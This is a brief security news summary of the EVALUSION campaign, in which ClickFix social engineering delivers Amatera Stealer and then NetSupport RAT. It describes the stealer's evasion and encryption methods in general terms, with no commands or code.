In November 2025, a new malware campaign named EVALUSION came to light, showcasing the increasing sophistication of cyber-attacks. The campaign utilizes a technique called ClickFix, where users are tricked into entering commands in the Windows Run window. This action initiates the download of Amatera Stealer, a potent malware that targets browsers, wallets, and password managers. Following the initial infection, attackers deploy NetSupport RAT, granting them total remote access to the compromised system.
The operation employs elaborate social engineering tactics to persuade victims to execute commands that deploy the malware. Amatera Stealer is known for its advanced evasion capabilities, originally branded as ACR Stealer by the criminal group SheldIO. It can bypass conventional security measures through techniques like WoW64 SysCalls and encrypted communication protocols. The malware uses unique methods to conceal its actions, including disabling the AMSI feature and employing RC2 encryption for payload retrieval. It effectively communicates with command servers using AES-256-CBC encrypted connections, complicating detection efforts for security teams.
👉 Pročitaj original: Cyber Security News
